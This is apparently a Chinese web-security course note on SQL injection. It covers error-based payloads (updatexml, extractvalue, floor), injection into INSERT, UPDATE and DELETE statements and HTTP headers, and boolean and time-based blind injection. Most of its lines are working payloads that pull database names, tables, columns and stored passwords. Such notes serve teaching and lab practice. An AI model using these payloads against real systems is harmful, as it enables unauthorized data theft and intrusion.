数字型的Sql注入
风炫安全Web安全学习第十一节课 字符型和搜索型的sql注入
风炫安全Web安全学习第十二节课 mysql报错函数注入
风炫安全Web安全学习第十三节课 CUD类型的sql注入
风炫安全Web安全学习第十四节课 Http header类型的sql注入
风炫安全Web安全学习第十五节课 基于时间和布尔型的Sql注入
SQL注入
基础知识
数字: select username,email from users where id=1;
字符串:Select id,email from members where username=‘xxx’;
搜索型:select id,email from member where username like ‘%v%’;
我们所有的注入的攻击,本质上是对网站上的sql进行闭合 然后执行我们自己的payload
基于报错的 updatexml()
allen’ and updatexml(1,version(),0)#
allen’ and updatexml(1,concat(0x7e, version()),0)#
获取表名:
allen’ and updatexml(1,concat(0x7e, (select table_name from information_schema.tables where table_schema=database() limit 1,1)),0)#
allen’ and updatexml(1,concat(0x7e, (select table_name from information_schema.tables where table_schema=database())),0)#
获取列名:
allen’ and updatexml(1,concat(0x7e, (select column_name from information_schema.columns where table_name=‘member’ limit 1,1)),0)#
再来获取数据
allen’ and updatexml(1,concat(0x7e, (select pw from member limit 0,1)),0)#
基于报错的extractvalue函数
用法同上
kobe’ and extractvalue(0, concat(0x7e, database())) #
基于floor()
取整函数
报错注入准确地说应该是floor,count,group by冲突报错
Lucy’ and (select 2 from (select count(*), concat(version(), floor(rand(0) * 2))x from information_schema.tables group by x)a )#
insert注入
insert into member(`username`, `pw`, `sex`, `phonenum`, `address`, `email`) values('123', '456', 'boy', 1, 2,3 );
insert into member(username,pw) value(‘allen’ or updatexml(1, concat(0x7e, database()),0) or ’ ',122);
update注入
同上
delete注入
1 or updatexml(1,concat(0x7e, (select pw from member limit 1,1)),0)
基于http header
Cookie:ant[uname]=admin' and updatexml(1,concat(0x7e, (select pw from member limit 1,1)),0)#
User-Agent: Firefox' or updatexml(1, concat(ox7e, database()), 0) or '
Sql盲注
lucy’ and 1=1#
lucy’ and 1=2#
布尔型的盲注:
lucy' and ascii(substr(database(),1,1))=100#
lucy' and ascii(substr(database(),1,1))>113#
时间的盲注
lucy' and sleep(5) #
and if(ascii(substr(database(), 2,1))=99, sleep(3), 1)